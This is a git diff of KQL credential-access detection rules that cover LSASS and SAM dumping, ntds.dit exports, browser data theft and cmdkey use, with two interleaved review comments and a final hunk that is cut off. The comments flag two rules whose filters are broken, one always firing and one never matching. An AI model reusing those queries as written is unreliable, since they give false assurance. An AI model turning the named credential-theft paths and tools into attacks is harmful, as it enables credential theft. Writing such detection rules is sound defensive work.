--- a/KQL/rules/Credential Access/new_generic_credentials_added_via_cmdkey_exe.kql
+++ b/KQL/rules/Credential Access/new_generic_credentials_added_via_cmdkey_exe.kql
@@ -1,13 +1,13 @@
-// Title: New Generic Credentials Added Via Cmdkey.EXE
-// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-02-03
-// Level: medium
-// Description: Detects usage of "cmdkey.exe" to add generic credentials.
-// As an example, this can be used before connecting to an RDP session via command line interface.
-// MITRE Tactic: Credential Access
-// Tags: attack.credential-access, attack.t1003.005
-// False Positives:
-// - Legitimate usage for administration purposes
-
-DeviceProcessEvents
+// Title: New Generic Credentials Added Via Cmdkey.EXE
+// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-02-03
+// Level: medium
+// Description: Detects usage of "cmdkey.exe" to add generic credentials.
+// As an example, this can be used before connecting to an RDP session via command line interface.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.005
+// False Positives:
+// - Legitimate usage for administration purposes
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains " -g" or ProcessCommandLine contains " /g" or ProcessCommandLine contains " –g" or ProcessCommandLine contains " —g" or ProcessCommandLine contains " ―g") and (ProcessCommandLine contains " -p" or ProcessCommandLine contains " /p" or ProcessCommandLine contains " –p" or ProcessCommandLine contains " —p" or ProcessCommandLine contains " ―p") and (ProcessCommandLine contains " -u" or ProcessCommandLine contains " /u" or ProcessCommandLine contains " –u" or ProcessCommandLine contains " —u" or ProcessCommandLine contains " ―u") and (FolderPath endswith "\\cmdkey.exe" or ProcessVersionInfoOriginalFileName =~ "cmdkey.exe")
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/ntds_dit_created.kql b/KQL/rules/Credential Access/ntds_dit_created.kql
index e2defb35..8340ad4a 100644
--- a/KQL/rules/Credential Access/ntds_dit_created.kql
+++ b/KQL/rules/Credential Access/ntds_dit_created.kql
@@ -1,10 +1,10 @@
-// Title: NTDS.DIT Created
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-05-05
-// Level: low
-// Description: Detects creation of a file named "ntds.dit" (Active Directory Database)
-// MITRE Tactic: Credential Access
-// Tags: attack.credential-access, attack.t1003.003
-
-DeviceFileEvents
+// Title: NTDS.DIT Created
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-05
+// Level: low
+// Description: Detects creation of a file named "ntds.dit" (Active Directory Database)
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.003
+
+DeviceFileEvents
 | where FolderPath endswith "ntds.dit"
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/ntds_dit_creation_by_uncommon_parent_process.kql b/KQL/rules/Credential Access/ntds_dit_creation_by_uncommon_parent_process.kql
index eba0d7ab..4fe8fd8c 100644
--- a/KQL/rules/Credential Access/ntds_dit_creation_by_uncommon_parent_process.kql
+++ b/KQL/rules/Credential Access/ntds_dit_creation_by_uncommon_parent_process.kql
@@ -1,10 +1,10 @@
-// Title: NTDS.DIT Creation By Uncommon Parent Process
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022-03-11
-// Level: high
-// Description: Detects creation of a file named "ntds.dit" (Active Directory Database) by an uncommon parent process or directory
-// MITRE Tactic: Credential Access
-// Tags: attack.credential-access, attack.t1003.003
-
-DeviceFileEvents
+// Title: NTDS.DIT Creation By Uncommon Parent Process
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-03-11
+// Level: high
+// Description: Detects creation of a file named "ntds.dit" (Active Directory Database) by an uncommon parent process or directory
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.003
+
+DeviceFileEvents
 | where FolderPath endswith "\\ntds.dit" and ((InitiatingProcessParentFileName in~ ("cscript.exe", "httpd.exe", "nginx.exe", "php-cgi.exe", "powershell.exe", "pwsh.exe", "w3wp.exe", "wscript.exe")) or (InitiatingProcessParentFileName startswith "apache" or InitiatingProcessParentFileName startswith "tomcat" or InitiatingProcessParentFileName startswith "" or InitiatingProcessParentFileName startswith "" or InitiatingProcessParentFileName startswith "" or InitiatingProcessParentFileName startswith ""))
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/ntds_dit_creation_by_uncommon_process.kql b/KQL/rules/Credential Access/ntds_dit_creation_by_uncommon_process.kql
index a344ac8b..af5c1e7b 100644
--- a/KQL/rules/Credential Access/ntds_dit_creation_by_uncommon_process.kql
+++ b/KQL/rules/Credential Access/ntds_dit_creation_by_uncommon_process.kql
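Review bot: The `| where` clause ends with four copies of `InitiatingProcessParentFileName startswith ""`; an empty prefix should be true for every non-empty value, so the inner `or` group is always satisfied and the rule fires on every `\ntds.dit` creation regardless of parent process, which defeats the "uncommon parent" intent and makes the `high` level misleading. These read like conversion artifacts where the source values were dropped, so either the missing prefixes should be restored from the upstream rule or the four empty terms removed, leaving `InitiatingProcessParentFileName startswith "apache" or InitiatingProcessParentFileName startswith "tomcat"` alongside the `in~` list. The `| where` line is context in this hunk, so the defect predates the commit; it is worth adding a check in the converter for empty string literals so it cannot recur.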
@@ -1,10 +1,10 @@
-// Title: NTDS.DIT Creation By Uncommon Process
-// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-01-11
-// Level: high
-// Description: Detects creation of a file named "ntds.dit" (Active Directory Database) by an uncommon process or a process located in a suspicious directory
-// MITRE Tactic: Credential Access
-// Tags: attack.credential-access, attack.t1003.002, attack.t1003.003
-
-DeviceFileEvents
+// Title: NTDS.DIT Creation By Uncommon Process
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-01-11
+// Level: high
+// Description: Detects creation of a file named "ntds.dit" (Active Directory Database) by an uncommon process or a process located in a suspicious directory
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.002, attack.t1003.003
+
+DeviceFileEvents
 | where FolderPath endswith "\\ntds.dit" and ((InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe" or InitiatingProcessFolderPath endswith "\\wsl.exe" or InitiatingProcessFolderPath endswith "\\wt.exe") or (InitiatingProcessFolderPath contains "\\AppData\\" or InitiatingProcessFolderPath contains "\\Temp\\" or InitiatingProcessFolderPath contains "\\Public\\" or InitiatingProcessFolderPath contains "\\PerfLogs\\"))
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/ntds_exfiltration_filename_patterns.kql b/KQL/rules/Credential Access/ntds_exfiltration_filename_patterns.kql
index ff5cdac2..5bad4655 100644
--- a/KQL/rules/Credential Access/ntds_exfiltration_filename_patterns.kql
+++ b/KQL/rules/Credential Access/ntds_exfiltration_filename_patterns.kql
@@ -1,10 +1,10 @@
-// Title: NTDS Exfiltration Filename Patterns
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022-03-11
-// Level: high
-// Description: Detects creation of files with specific name patterns seen used in various tools that export the NTDS.DIT for exfiltration.
-// MITRE Tactic: Credential Access
-// Tags: attack.credential-access, attack.t1003.003
-
-DeviceFileEvents
+// Title: NTDS Exfiltration Filename Patterns
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-03-11
+// Level: high
+// Description: Detects creation of files with specific name patterns seen used in various tools that export the NTDS.DIT for exfiltration.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.003
+
+DeviceFileEvents
 | where FolderPath endswith "\\All.cab" or FolderPath endswith ".ntds.cleartext"
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/permission_misconfiguration_reconnaissance_via_findstr_exe.kql b/KQL/rules/Credential Access/permission_misconfiguration_reconnaissance_via_findstr_exe.kql
index ea618367..3e502fc9 100644
--- a/KQL/rules/Credential Access/permission_misconfiguration_reconnaissance_via_findstr_exe.kql
+++ b/KQL/rules/Credential Access/permission_misconfiguration_reconnaissance_via_findstr_exe.kql
@@ -1,11 +1,11 @@
-// Title: Permission Misconfiguration Reconnaissance Via Findstr.EXE
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-08-12
-// Level: medium
-// Description: Detects usage of findstr with the "EVERYONE" or "BUILTIN" keywords.
-// This was seen being used in combination with "icacls" and other utilities to spot misconfigured files or folders permissions.
-// MITRE Tactic: Credential Access
-// Tags: attack.credential-access, attack.t1552.006
-
-DeviceProcessEvents
+// Title: Permission Misconfiguration Reconnaissance Via Findstr.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-12
+// Level: medium
+// Description: Detects usage of findstr with the "EVERYONE" or "BUILTIN" keywords.
+// This was seen being used in combination with "icacls" and other utilities to spot misconfigured files or folders permissions.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1552.006
+
+DeviceProcessEvents
 | where ((ProcessCommandLine contains "\"Everyone\"" or ProcessCommandLine contains "'Everyone'" or ProcessCommandLine contains "\"BUILTIN\\\"" or ProcessCommandLine contains "'BUILTIN\\'") and ((FolderPath endswith "\\find.exe" or FolderPath endswith "\\findstr.exe") or (ProcessVersionInfoOriginalFileName in~ ("FIND.EXE", "FINDSTR.EXE")))) or (ProcessCommandLine contains "icacls " and ProcessCommandLine contains "findstr " and ProcessCommandLine contains "Everyone")
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/potential_browser_data_stealing.kql b/KQL/rules/Credential Access/potential_browser_data_stealing.kql
index a619e777..2f198cda 100644
--- a/KQL/rules/Credential Access/potential_browser_data_stealing.kql
+++ b/KQL/rules/Credential Access/potential_browser_data_stealing.kql
@@ -1,12 +1,12 @@
-// Title: Potential Browser Data Stealing
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-12-23
-// Level: medium
-// Description: Adversaries may acquire credentials from web browsers by reading files specific to the target browser.
-// Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future.
-// Web browsers typically store the credentials in an encrypted format within a credential store.
-// MITRE Tactic: Credential Access
-// Tags: attack.credential-access, attack.t1555.003
-
-DeviceProcessEvents
+// Title: Potential Browser Data Stealing
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-12-23
+// Level: medium
+// Description: Adversaries may acquire credentials from web browsers by reading files specific to the target browser.
+// Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future.
+// Web browsers typically store the credentials in an encrypted format within a credential store.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1555.003
+
+DeviceProcessEvents
 | where ((ProcessCommandLine contains "copy-item" or ProcessCommandLine contains "copy " or ProcessCommandLine contains "cpi " or ProcessCommandLine contains " cp " or ProcessCommandLine contains "move " or ProcessCommandLine contains "move-item" or ProcessCommandLine contains " mi " or ProcessCommandLine contains " mv ") or (FolderPath endswith "\\esentutl.exe" or FolderPath endswith "\\xcopy.exe" or FolderPath endswith "\\robocopy.exe") or (ProcessVersionInfoOriginalFileName in~ ("esentutl.exe", "XCOPY.EXE", "robocopy.exe"))) and (ProcessCommandLine contains "\\Amigo\\User Data" or ProcessCommandLine contains "\\BraveSoftware\\Brave-Browser\\User Data" or ProcessCommandLine contains "\\CentBrowser\\User Data" or ProcessCommandLine contains "\\Chromium\\User Data" or ProcessCommandLine contains "\\CocCoc\\Browser\\User Data" or ProcessCommandLine contains "\\Comodo\\Dragon\\User Data" or ProcessCommandLine contains "\\Elements Browser\\User Data" or ProcessCommandLine contains "\\Epic Privacy Browser\\User Data" or ProcessCommandLine contains "\\Google\\Chrome Beta\\User Data" or ProcessCommandLine contains "\\Google\\Chrome SxS\\User Data" or ProcessCommandLine contains "\\Google\\Chrome\\User Data\\" or ProcessCommandLine contains "\\Kometa\\User Data" or ProcessCommandLine contains "\\Maxthon5\\Users" or ProcessCommandLine contains "\\Microsoft\\Edge\\User Data" or ProcessCommandLine contains "\\Mozilla\\Firefox\\Profiles" or ProcessCommandLine contains "\\Nichrome\\User Data" or ProcessCommandLine contains "\\Opera Software\\Opera GX Stable\\" or ProcessCommandLine contains "\\Opera Software\\Opera Neon\\User Data" or ProcessCommandLine contains "\\Opera Software\\Opera Stable\\" or ProcessCommandLine contains "\\Orbitum\\User Data" or ProcessCommandLine contains "\\QIP Surf\\User Data" or ProcessCommandLine contains "\\Sputnik\\User Data" or ProcessCommandLine contains "\\Torch\\User Data" or ProcessCommandLine contains "\\uCozMedia\\Uran\\User Data" or ProcessCommandLine contains "\\Vivaldi\\User Data")
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/potential_credential_dumping_attempt_using_new_networkprovider_cli.kql b/KQL/rules/Credential Access/potential_credential_dumping_attempt_using_new_networkprovider_cli.kql
index 6cee6571..c913f200 100644
--- a/KQL/rules/Credential Access/potential_credential_dumping_attempt_using_new_networkprovider_cli.kql
+++ b/KQL/rules/Credential Access/potential_credential_dumping_attempt_using_new_networkprovider_cli.kql
@@ -1,12 +1,12 @@
-// Title: Potential Credential Dumping Attempt Using New NetworkProvider - CLI
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-08-23
-// Level: high
-// Description: Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it
-// MITRE Tactic: Credential Access
-// Tags: attack.credential-access, attack.t1003
-// False Positives:
-// - Other legitimate network providers used and not filtred in this rule
-
-DeviceProcessEvents
+// Title: Potential Credential Dumping Attempt Using New NetworkProvider - CLI
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-23
+// Level: high
+// Description: Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003
+// False Positives:
+// - Other legitimate network providers used and not filtred in this rule
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "\\System\\CurrentControlSet\\Services\\" and ProcessCommandLine contains "\\NetworkProvider"
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/potential_credential_dumping_attempt_using_new_networkprovider_reg.kql b/KQL/rules/Credential Access/potential_credential_dumping_attempt_using_new_networkprovider_reg.kql
index cc0b9dd7..c5d6b1af 100644
--- a/KQL/rules/Credential Access/potential_credential_dumping_attempt_using_new_networkprovider_reg.kql
+++ b/KQL/rules/Credential Access/potential_credential_dumping_attempt_using_new_networkprovider_reg.kql
@@ -1,12 +1,12 @@
-// Title: Potential Credential Dumping Attempt Using New NetworkProvider - REG
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-08-23
-// Level: medium
-// Description: Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it
-// MITRE Tactic: Credential Access
-// Tags: attack.credential-access, attack.t1003
-// False Positives:
-// - Other legitimate network providers used and not filtred in this rule
-
-DeviceRegistryEvents
+// Title: Potential Credential Dumping Attempt Using New NetworkProvider - REG
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-23
+// Level: medium
+// Description: Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003
+// False Positives:
+// - Other legitimate network providers used and not filtred in this rule
+
+DeviceRegistryEvents
 | where (RegistryKey endswith "\\System\\CurrentControlSet\\Services*" and RegistryKey contains "\\NetworkProvider") and (not(((RegistryKey contains "\\System\\CurrentControlSet\\Services\\WebClient\\NetworkProvider" or RegistryKey contains "\\System\\CurrentControlSet\\Services\\LanmanWorkstation\\NetworkProvider" or RegistryKey contains "\\System\\CurrentControlSet\\Services\\RDPNP\\NetworkProvider") or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\poqexec.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/potential_credential_dumping_via_lsass_process_clone.kql b/KQL/rules/Credential Access/potential_credential_dumping_via_lsass_process_clone.kql
index 3162f7cb..6650139b 100644
--- a/KQL/rules/Credential Access/potential_credential_dumping_via_lsass_process_clone.kql
+++ b/KQL/rules/Credential Access/potential_credential_dumping_via_lsass_process_clone.kql
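Review bot: `RegistryKey endswith "\\System\\CurrentControlSet\\Services*"` on the query line can never be true: KQL `endswith` treats the `*` as a literal character, and the same predicate also requires the key to contain `\\NetworkProvider`, so no key both ends in `Services*` and contains a later `\\NetworkProvider` segment, leaving the rule matching nothing. The `*` looks like a source-rule wildcard carried through conversion untranslated; the intended test is a path-segment match, e.g. `RegistryKey contains "\\System\\CurrentControlSet\\Services\\" and RegistryKey contains "\\NetworkProvider"`. The hunk's removed and added header lines appear identical (presumably a line-ending change) and the query is unchanged context, so this predates the commit, but the converter should flag any `*` left inside an endswith/startswith operand since the same pattern could silently disable other converted rules.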
@@ -1,10 +1,10 @@
-// Title: Potential Credential Dumping Via LSASS Process Clone
-// Author: Florian Roth (Nextron Systems), Samir Bousseaden
-// Date: 2021-11-27
-// Level: critical
-// Description: Detects a suspicious LSASS process process clone that could be a sign of credential dumping activity
-// MITRE Tactic: Credential Access
-// Tags: attack.credential-access, attack.t1003, attack.t1003.001
-
-DeviceProcessEvents
+// Title: Potential Credential Dumping Via LSASS Process Clone
+// Author: Florian Roth (Nextron Systems), Samir Bousseaden
+// Date: 2021-11-27
+// Level: critical
+// Description: Detects a suspicious LSASS process process clone that could be a sign of credential dumping activity
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003, attack.t1003.001
+
+DeviceProcessEvents
 | where FolderPath endswith "\\Windows\\System32\\lsass.exe" and InitiatingProcessFolderPath endswith "\\Windows\\System32\\lsass.exe"
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/potential_credential_dumping_via_lsass_silentprocessexit_technique.kql b/KQL/rules/Credential Access/potential_credential_dumping_via_lsass_silentprocessexit_technique.kql
index f49027a9..df0567dc 100644
--- a/KQL/rules/Credential Access/potential_credential_dumping_via_lsass_silentprocessexit_technique.kql
+++ b/KQL/rules/Credential Access/potential_credential_dumping_via_lsass_silentprocessexit_technique.kql
@@ -1,12 +1,12 @@
-// Title: Potential Credential Dumping Via LSASS SilentProcessExit Technique
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021-02-26
-// Level: critical
-// Description: Detects changes to the Registry in which a monitor program gets registered to dump the memory of the lsass.exe process
-// MITRE Tactic: Credential Access
-// Tags: attack.credential-access, attack.t1003.001
-// False Positives:
-// - Unlikely
-
-DeviceRegistryEvents
+// Title: Potential Credential Dumping Via LSASS SilentProcessExit Technique
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-02-26
+// Level: critical
+// Description: Detects changes to the Registry in which a monitor program gets registered to dump the memory of the lsass.exe process
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.001
+// False Positives:
+// - Unlikely
+
+DeviceRegistryEvents
 | where RegistryKey contains "Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\lsass.exe"
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/potential_credential_dumping_via_wer.kql b/KQL/rules/Credential Access/potential_credential_dumping_via_wer.kql
index 4c0c29b3..a5860a75 100644
--- a/KQL/rules/Credential Access/potential_credential_dumping_via_wer.kql
+++ b/KQL/rules/Credential Access/potential_credential_dumping_via_wer.kql
@@ -1,12 +1,12 @@
-// Title: Potential Credential Dumping Via WER
-// Author: @pbssubhash , Nasreddine Bencherchali
-// Date: 2022-12-08
-// Level: high
-// Description: Detects potential credential dumping via Windows Error Reporting LSASS Shtinkering technique which uses the Windows Error Reporting to dump lsass
-// MITRE Tactic: Credential Access
-// Tags: attack.credential-access, attack.t1003.001
-// False Positives:
-// - Windows Error Reporting might produce similar behavior. In that case, check the PID associated with the "-p" parameter in the CommandLine.
-
-DeviceProcessEvents
+// Title: Potential Credential Dumping Via WER
+// Author: @pbssubhash , Nasreddine Bencherchali
+// Date: 2022-12-08
+// Level: high
+// Description: Detects potential credential dumping via Windows Error Reporting LSASS Shtinkering technique which uses the Windows Error Reporting to dump lsass
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.001
+// False Positives:
+// - Windows Error Reporting might produce similar behavior. In that case, check the PID associated with the "-p" parameter in the CommandLine.
+
+DeviceProcessEvents
 | where (((ProcessCommandLine contains " -u -p " and ProcessCommandLine contains " -ip " and ProcessCommandLine contains " -s ") and (InitiatingProcessAccountName contains "AUTHORI" or InitiatingProcessAccountName contains "AUTORI") and (AccountName contains "AUTHORI" or AccountName contains "AUTORI")) and (FolderPath endswith "\\Werfault.exe" or ProcessVersionInfoOriginalFileName =~ "WerFault.exe")) and (not(InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\lsass.exe"))
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/potential_network_sniffing_activity_using_network_tools.kql b/KQL/rules/Credential Access/potential_network_sniffing_activity_using_network_tools.kql
index 716ca4a5..7790f853 100644
--- a/KQL/rules/Credential Access/potential_network_sniffing_activity_using_network_tools.kql
+++ b/KQL/rules/Credential Access/potential_network_sniffing_activity_using_network_tools.kql
@@ -1,14 +1,14 @@
-// Title: Potential Network Sniffing Activity Using Network Tools
-// Author: Timur Zinniatullin, oscd.community, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2019-10-21
-// Level: medium
-// Description: Detects potential network sniffing via use of network tools such as "tshark", "windump".
-// Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection.
-// An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
-// MITRE Tactic: Credential Access
-// Tags: attack.credential-access, attack.discovery, attack.t1040
-// False Positives:
-// - Legitimate administration activity to troubleshoot network issues
-
-DeviceProcessEvents
+// Title: Potential Network Sniffing Activity Using Network Tools
+// Author: Timur Zinniatullin, oscd.community, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2019-10-21
+// Level: medium
+// Description: Detects potential network sniffing via use of network tools such as "tshark", "windump".
+// Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection.
+// An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.discovery, attack.t1040
+// False Positives:
+// - Legitimate administration activity to troubleshoot network issues
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "-i" and FolderPath endswith "\\tshark.exe") or FolderPath endswith "\\windump.exe"
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/potential_powershell_console_history_access_attempt_via_history_file.kql b/KQL/rules/Credential Access/potential_powershell_console_history_access_attempt_via_history_file.kql
index 3a9cb5be..f4ea56e5 100644
--- a/KQL/rules/Credential Access/potential_powershell_console_history_access_attempt_via_history_file.kql
+++ b/KQL/rules/Credential Access/potential_powershell_console_history_access_attempt_via_history_file.kql
@@ -1,13 +1,13 @@
-// Title: Potential PowerShell Console History Access Attempt via History File
-// Author: Luc Génaux
-// Date: 2025-04-03
-// Level: medium
-// Description: Detects potential access attempts to the PowerShell console history directly via history file (ConsoleHost_history.txt).
-// This can give access to plaintext passwords used in PowerShell commands or used for general reconnaissance.
-// MITRE Tactic: Credential Access
-// Tags: attack.credential-access, attack.t1552.001
-// False Positives:
-// - Legitimate access of the console history file is possible
-
-DeviceProcessEvents
+// Title: Potential PowerShell Console History Access Attempt via History File
+// Author: Luc Génaux
+// Date: 2025-04-03
+// Level: medium
+// Description: Detects potential access attempts to the PowerShell console history directly via history file (ConsoleHost_history.txt).
+// This can give access to plaintext passwords used in PowerShell commands or used for general reconnaissance.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1552.001
+// False Positives:
+// - Legitimate access of the console history file is possible
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "ConsoleHost_history.txt" or ProcessCommandLine contains "(Get-PSReadLineOption).HistorySavePath"
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/potential_reconnaissance_for_cached_credentials_via_cmdkey_exe.kql b/KQL/rules/Credential Access/potential_reconnaissance_for_cached_credentials_via_cmdkey_exe.kql
index ed96ee5e..f996d3c3 100644
--- a/KQL/rules/Credential Access/potential_reconnaissance_for_cached_credentials_via_cmdkey_exe.kql
+++ b/KQL/rules/Credential Access/potential_reconnaissance_for_cached_credentials_via_cmdkey_exe.kql
@@ -1,12 +1,12 @@
-// Title: Potential Reconnaissance For Cached Credentials Via Cmdkey.EXE
-// Author: jmallette, Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2019-01-16
-// Level: high
-// Description: Detects usage of cmdkey to look for cached credentials on the system
-// MITRE Tactic: Credential Access
-// Tags: attack.credential-access, attack.t1003.005
-// False Positives:
-// - Legitimate administrative tasks
-
-DeviceProcessEvents
+// Title: Potential Reconnaissance For Cached Credentials Via Cmdkey.EXE
+// Author: jmallette, Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2019-01-16
+// Level: high
+// Description: Detects usage of cmdkey to look for cached credentials on the system
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.005
+// False Positives:
+// - Legitimate administrative tasks
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains " -l" or ProcessCommandLine contains " /l" or ProcessCommandLine contains " –l" or ProcessCommandLine contains " —l" or ProcessCommandLine contains " ―l") and (FolderPath endswith "\\cmdkey.exe" or ProcessVersionInfoOriginalFileName =~ "cmdkey.exe")
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/potential_sam_database_dump.kql b/KQL/rules/Credential Access/potential_sam_database_dump.kql
index 1a870e9b..33c6c458 100644
--- a/KQL/rules/Credential Access/potential_sam_database_dump.kql
+++ b/KQL/rules/Credential Access/potential_sam_database_dump.kql
@@ -1,12 +1,12 @@
-// Title: Potential SAM Database Dump
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022-02-11
-// Level: high
-// Description: Detects the creation of files that look like exports of the local SAM (Security Account Manager)
-// MITRE Tactic: Credential Access
-// Tags: attack.credential-access, attack.t1003.002
-// False Positives:
-// - Rare cases of administrative activity
-
-DeviceFileEvents
+// Title: Potential SAM Database Dump
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-02-11
+// Level: high
+// Description: Detects the creation of files that look like exports of the local SAM (Security Account Manager)
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.002
+// False Positives:
+// - Rare cases of administrative activity
+
+DeviceFileEvents
 | where (FolderPath endswith "\\Temp\\sam" or FolderPath endswith "\\sam.sav" or FolderPath endswith "\\Intel\\sam" or FolderPath endswith "\\sam.hive" or FolderPath endswith "\\Perflogs\\sam" or FolderPath endswith "\\ProgramData\\sam" or FolderPath endswith "\\Users\\Public\\sam" or FolderPath endswith "\\AppData\\Local\\sam" or FolderPath endswith "\\AppData\\Roaming\\sam" or FolderPath endswith "_ShadowSteal.zip" or FolderPath endswith "\\Documents\\SAM.export" or FolderPath endswith ":\\sam") or (FolderPath contains "\\hive_sam_" or FolderPath contains "\\sam.save" or FolderPath contains "\\sam.export" or FolderPath contains "\\~reg_sam.save" or FolderPath contains "\\sam_backup" or FolderPath contains "\\sam.bck" or FolderPath contains "\\sam.backup")
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/potential_spn_enumeration_via_setspn_exe.kql b/KQL/rules/Credential Access/potential_spn_enumeration_via_setspn_exe.kql
index 677efffa..98eb1efd 100644
--- a/KQL/rules/Credential Access/potential_spn_enumeration_via_setspn_exe.kql
+++ b/KQL/rules/Credential Access/potential_spn_enumeration_via_setspn_exe.kql
@@ -1,12 +1,12 @@
-// Title: Potential SPN Enumeration Via Setspn.EXE
-// Author: Markus Neis, keepwatch
-// Date: 2018-11-14
-// Level: medium
-// Description: Detects service principal name (SPN) enumeration used for Kerberoasting
-// MITRE Tactic: Credential Access
-// Tags: attack.credential-access, attack.t1558.003
-// False Positives:
-// - Administration activity
-
-DeviceProcessEvents
+// Title: Potential SPN Enumeration Via Setspn.EXE
+// Author: Markus Neis, keepwatch
+// Date: 2018-11-14
+// Level: medium
+// Description: Detects service principal name (SPN) enumeration used for Kerberoasting
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1558.003
+// False Positives:
+// - Administration activity
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains " -q " or ProcessCommandLine contains " /q ") and (FolderPath endswith "\\setspn.exe" or ProcessVersionInfoOriginalFileName =~ "setspn.exe" or (ProcessVersionInfoFileDescription contains "Query or reset the computer" and ProcessVersionInfoFileDescription contains "SPN attribute"))
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/potential_windows_defender_av_bypass_via_dump64_exe_rename.kql b/KQL/rules/Credential Access/potential_windows_defender_av_bypass_via_dump64_exe_rename.kql
index 40610060..68f3da01 100644
--- a/KQL/rules/Credential Access/potential_windows_defender_av_bypass_via_dump64_exe_rename.kql
+++ b/KQL/rules/Credential Access/potential_windows_defender_av_bypass_via_dump64_exe_rename.kql
@@ -1,11 +1,11 @@
-// Title: Potential Windows Defender AV Bypass Via Dump64.EXE Rename
-// Author: Austin Songer @austinsonger, Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2021-11-26
-// Level: high
-// Description: Detects when a user is potentially trying to bypass the Windows Defender AV by renaming a tool to dump64.exe and placing it in the Visual Studio folder.
-// Currently the rule is covering only usage of procdump but other utilities can be added in order to increase coverage.
-// MITRE Tactic: Credential Access
-// Tags: attack.credential-access, attack.t1003.001
-
-DeviceProcessEvents
+// Title: Potential Windows Defender AV Bypass Via Dump64.EXE Rename
